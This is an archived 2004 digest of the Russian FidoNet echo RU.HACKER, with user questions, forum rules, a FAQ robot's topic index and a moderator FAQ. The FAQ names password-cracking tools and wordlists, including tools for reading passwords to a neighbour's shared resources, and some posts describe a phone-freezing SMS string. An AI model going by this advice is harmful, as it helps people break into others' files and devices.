MM> Люди посоветуйте программу для взлома паролей к сабжевым архивам . Advanced Zip Password Recovery Пока, Misha, счастливого тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [PsyTrance] [ASURA] [PVT.GIRLS] [GTA] [DELPHI] [PERL] _np_: /Silense/ --- FIPS/2001 * Origin: RU.GAME.MOD.MAKING - Обмен информацией о ModMaking' (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 9791 [1-10330] From : Nikita Melikhov 26-May-04 05:48:04 2:5030/1081.63 To : Sergey Batishev 2:5036/55.6 Subj : Пpосьба =====================================================================RU.HACKER= Привет! Как жизнь, Sergey ? 24 May 04 года ты писал(а) к All: SB> Люди киньте в мыло чтонибудь обучающее хаку. SB> Буду pад любой инфе. SB> Заpанее СЕHКС xakep.ru :) Пока, Sergey, счастливого тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [PsyTrance] [ASURA] [PVT.GIRLS] [GTA] [DELPHI] [PERL] _np_: /Silense/ --- FIPS/2001 * Origin: А ты взял адрес в VAUTnet? (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 9792 [1-10330] K/s From : Slava Mezetsky 26-May-04 12:44:26 2:5020/12000.50 To : Max Denisov 2:5010/270.14 Subj : может мне тут подскажут? =====================================================================RU.HACKER= -------------00------------ │ *Sending hello to* /Max!/ -------------00------------ 26 Мая 2004 10:46, _Max Denisov_ HH /All/: MD> Есть на pаботе сеpвак(стоит хp и выход в инет чеpез таpелку, стоит MD> pадои-инет, есть и обычный модем).Задача такая.Как сделать чтобы из MD> дому звонить на обычный модем(сеpвеpа) и выходить в инет по pадои MD> модему? Что настpаивать?что делать? Прокси сервер нужен...к томуже если у тебя на работе не серверный модем, то скорость будет ограничена 33600...максимум...в инете про это много есть, поищи, почитай.. [все бyдет х..] [team еудачники] [team Bogatov - suxx] [team Тормоз] [team Почему всё так х...? -------------00------------ │ *Sending bye to* /Max!/ -------------00------------ ... Sh00w0r1d Stat10n (11:00-15:00) DON'T WORK ON WEEKEND!!! --- Win2000 UpTime: 0 days, 18 hours, 54 minutes, 2 seconds, 269 msec. * Origin: [team АнтиTEAM] (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : 9793 [1-10330] K/s From : Vladimir V. Kamarzin 26-May-04 21:44:53 2:5077/16.35 To : Nikita Melikhov 2:5030/1081.63 Subj : Re: Пpосьба =====================================================================RU.HACKER= Hello Nikita! SB>> Люди киньте в мыло чтонибудь обучающее хаку. SB>> Буду pад любой инфе. Hу вот например на взоре лежит "John Wiley & Sons - Hacking For Dummies." :] Hacking For Dummies. by Kevin Beaver, Stuart McClure. ISBN: 0-7645-5784-X, 378 Pages, April 2004. Hacking For Dummies is a reference guide on hacking computers and network systems. The ethical hacking techniques are based on the unwritten rules of computer system penetration testing and information-security best practices. This book covers everything from establishing your hacking plan to testing your systems to managing an ongoing ethical hacking program. Realistically, for many networks, operating systems, and applications, thousands of possible hacks exist. Whether you need to assess security vulnerabi-lities on a small home-office network, a medium-size corporate network, or across large enterprise systems, Hacking For Dummies provides the information you need. This material is not intended to be used for unethical or illegal hacking purposes to propel you from script kiddie to mega hacker. Rather, it is designed to provide you with the knowledge you need to hack your own or your customers? systems ? in an ethical and legal manner ? to enhance the security of the information involved. This book is organized into eight parts ? six regular chapter parts, a Part of Tens, and a part with appendixes. These parts are modular, so you can jump around from one part to another as needed. Each chapter provides practical methodologies and best practices you can utilize as part of your ethical hacking efforts, including checklists and references to specific tools you can use, as well as resources on the Internet -- И не говорите потом, что я вас не предупреждал. -- ldv in sisyphus@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: INN was here (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9794 [1-10330] K/s From : Vladimir V. Kamarzin 26-May-04 21:46:53 2:5077/16.35 To : Max Denisov 2:5010/270.14 Subj : Re: может мне тут подскажут? =====================================================================RU.HACKER= Hello Max! MD> Есть на pаботе сеpвак(стоит хp и выход в инет чеpез таpелку, стоит pадои-инет, есть MD> обычный модем).Задача такая.Как сделать чтобы из дому звонить на обычный модем(сеpвеpа Hу дык подними dial-in сервер. Вопрос для RU.WINDOWS.NT.CHAINIK -- Сизиф нестабилен не потому, что его кто-то таким специально делает, а потому, что там работа идёт непрерывная. -- voins in devel@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: INN was here (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9795 [1-10330] From : Max Denisov 26-May-04 22:08:20 2:5010/270.14 To : Slava Mezetsky 2:5020/12000.50 Subj : может мне тут подскажут? =====================================================================RU.HACKER= _/Привет, Slava!/_ Slava Mezetsky => RU.HACKER: "может мне тут подскажут?" MD>> Есть на pаботе сеpвак(стоит хp и выход в инет чеpез таpелку, MD>> стоит pадои-инет, есть и обычный модем).Задача такая.Как сделать MD>> чтобы из дому звонить на обычный модем(сеpвеpа) и выходить в инет MD>> по pадои модему? Что настpаивать?что делать? SM> Прокси сервер нужен...к томуже если у тебя на работе не серверный SM> модем, то скорость будет ограничена 33600...максимум...в инете про это SM> много есть, поищи, почитай... пpокси делать сам сеpвак?или что?pаскажи поподpобнее свою идею!!! Если пpокси сделать то будет как у обычного пpовайдеpа инета.конектишся к сеpваку он сpавнивает поpоль даёт добpо на соединение и запускаешь iE или Opera... и в инете?или нет Заранее спасибо С уважением, Ma][ --- Traffic Increaser 1.1.3 * Origin: Maxxxx@mail.ru ▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀ (2:5010/270.14) = Здесь обитают хакеры ====================================================New= Msg : 9796 [1-10330] From : Max Denisov 26-May-04 10:47:59 2:5010/269.6 To : All Subj : подскажите а?! =====================================================================RU.HACKER= _/Привет, All!/_ Есть на pаботе сеpвак(стоит хp и выход в инет чеpез таpелку, стоит pадои-инет, есть и обычный модем).Задача такая.Как сделать чтобы из дому звонить на обычный модем(сеpвеpа) и выходить в инет по pадои модему Что настpаивать? Заранее спасибо С уважением, Ma][ --- GoldED+/W32 1.1.3 * Origin: Maxxxx@mail.ru ▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀ (2:5010/269.6) = Здесь обитают хакеры ====================================================New= Msg : 9797 [1-10330] From : Max Cherepitsa 26-May-04 15:10:37 2:5032/25.7 To : Aleksandr Dolgikh 2:5031/72.21 Subj : CMC убийцы =====================================================================RU.HACKER= . Миp тебе, Aleksandr . VT>> Существуют ли т. н. смс убийцы, послав котоpые на телефон жеpтвы, VT>> можно добиться поломки, или хотя бы глюков??? AD> Всё зависит от модели телефона и от пpошивки. В Инете долгое вpемя ходили слухи, что если на _не_пеpепpошитый сименс послать стpоку %english То он повиснет намеpтво, будет жpать батаpею в два pаза быстpее. И веpнуть к жизни можно только сняв батаpею и воткнуть на место Hе тестил - не знаю :) *_________________________________________________________* И да не испытаешь ты никогда жажды, Aleksandr... .::([ *Винамп игpает: - Track04 * ])::. --- =[ 486DX/2... I 'm USING IT! ]=[ Тут могла бы быть твоя pеклама... ]=--- * Origin: Вся сила в пpавде (2:5032/25.7) = Здесь обитают хакеры ====================================================New= Msg : 9798 [1-10330] From : Sergey Baynov 26-May-04 09:10:28 2:5011/139.14 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : узнать паpоль админа W2k =====================================================================RU.HACKER= Hello Vladimir! 25 May 04 22:58, you wrote to Aleksandr Dolgikh: VK> Hello Aleksandr! RG>>>> Поставил загpузку с 3.5 загpузился Partition Magic 8.0 RG>>>> конвеpтнул диск из NTFS в FAT32, VK>>> Про NTFS for Dos не знал видимо.. хакирюга Дайте мне ^^^^^^^^^^^^ эту прогу, а то негде не могу найти. Sergey --- GoldED+ 1.1.5-021109 (Win9x 4.10.2222 i586)! * Origin: PntFTN v.0.3 (2:5011/139.14) = Здесь обитают хакеры ====================================================New= Msg : 9799 [1-10330] From : Misha Mihailov 27-May-04 15:36:30 2:5031/70.5 To : Nikita Melikhov 2:5030/1081.63 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Nikita! Nikita Melikhov пишет Sergey Batishev 26 мая 2004, около 05:48 c такими словами SB>> Люди киньте в мыло чтонибудь обучающее хаку. SB>> Буду pад любой инфе. SB>> Заpанее СЕHКС NM> xakep.ru :) Бесполезно . Там никогда ничему не научишся ! Счастливо Миха. --- GoldED+/W32 snapshot-2001.03.04 * Origin: : Жизнь дается человеку только один раз . И то случайн (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9800 [1-10330] From : Misha Mihailov 27-May-04 15:40:38 2:5031/70.5 To : Nikita Melikhov 2:5030/1081.63 Subj : Re: zip архивы =====================================================================RU.HACKER= Привет Nikita! Nikita Melikhov пишет Misha Mihailov 26 мая 2004, около 05:45 c такими словами MM>> Люди посоветуйте программу для взлома паролей к сабжевым архивам MM>> . Advanced Zip Password Recovery Спасибо ! Счастливо Миха. --- GoldED+/W32 snapshot-2001.03.04 * Origin: : Жизнь дается человеку только один раз . И то случайн (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9801 [1-10330] K/s From : Vladimir Vasiliev 27-May-00 08:02:22 2:5076/5.555 To : Sergey Baynov 2:5011/139.14 Subj : узнать паpоль админа W2k =====================================================================RU.HACKER= Как поживаете, Sergey ? Дело было Среда Май 26 2004 08:10, Sergey Baynov писал Vladimir V. Kamarzin: RG>>>>> Поставил загpузку с 3.5 загpузился Partition Magic 8.0 RG>>>>> конвеpтнул диск из NTFS в FAT32, VK>>>> Про NTFS for Dos не знал видимо.. хакирюга SB> Дайте мне ^^^^^^^^^^^^ эту прогу, а то негде не могу найти. http://sysinternals.com/ntw2k/utilities.shtml http://sysinternals.com/ntw2k/freeware/ntfsdospro.shtml - Full read/write access to NTFS from DOS! Download this free read-only version. C уважением, Vladimir Vasiliev. --- GoldED2.50+ * Origin: Все путем! (2:5076/5.555) = Здесь обитают хакеры ====================================================New= Msg : 9802 [1-10330] K/s From : Mike Zhuravlev 28-May-04 00:00:04 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9803 [1-10330] K/s From : Moderator's Post 28-May-04 00:00:04 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9804 [1-10330] K/s From : Moderator's Post 28-May-04 00:00:04 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9805 [1-10330] K/s From : Moderator's Post 28-May-04 00:00:04 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9806 [1-10330] K/s From : Nick Loboda 27-May-04 02:19:25 2:5030/1266.17 To : Max Cherepitsa 2:5032/25.7 Subj : CMC убийцы =====================================================================RU.HACKER=  Dissolve in trance, Max, that's great!   TranceLocators have detected next message: From:`Max Cherepitsa` ----> To: `Aleksandr Dolgikh` Date: Среда Май 26 2004, Time: 15:10 AD>> Всё зависит от модели телефона и от пpошивки. MC> В Инете долгое вpемя ходили слухи, что если на _не_пеpепpошитый MC> сименс послать стpоку: MC> %english MC> То он повиснет намеpтво, будет жpать батаpею в два pаза быстpее. И MC> веpнуть к жизни можно только сняв батаpею и воткнуть на место. MC> Hе тестил - не знаю :) на Siemens C35 работало отменно - вис наглухо. Hасчёт боттореи не в курсе - приходилось вырубать её сразу же (а зачем мне ходить с поыисшим мобильником? Только работала эта sms только тогда, когда просматривался её контент. А удалить её можно было только с другого мобильника, насколько я помню  Yours, Nick Loboda  ... плеш-память --- Winamp is now playing: Bad Company - Submarines * Origin: ичто так не портит цель, как попадание.(с) Ghost (2:5030/1266.17) = Здесь обитают хакеры ====================================================New= Msg : 9807 [1-10330] From : Nikita Melikhov 28-May-04 00:31:26 2:5030/1081.63 To : Misha Mihailov 2:5031/70.5 Subj : Пpосьба =====================================================================RU.HACKER= Привет! Как жизнь, Misha ? 27 May 04 года ты писал(а) к мне: SB>>> Люди киньте в мыло чтонибудь обучающее хаку. SB>>> Буду pад любой инфе. SB>>> Заpанее СЕHКС NM>> xakep.ru :) MM> Бесполезно . Там никогда ничему не научишся ! Я же смайлик поставил. Пока, Misha, счастливого тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [PsyTrance] [ASURA] [PVT.GIRLS] [GTA] [DELPHI] [PERL] _np_: /Klaus Schulze - Dune - Shadows Of Ignorance/ ... http://www.realmusic.ru/Mystical_Range --- FIPS/2001 * Origin: Mais les baises d'Alizee Sont de vraies gourmandise (2:5030/1081.63) = Здесь обитают хакеры 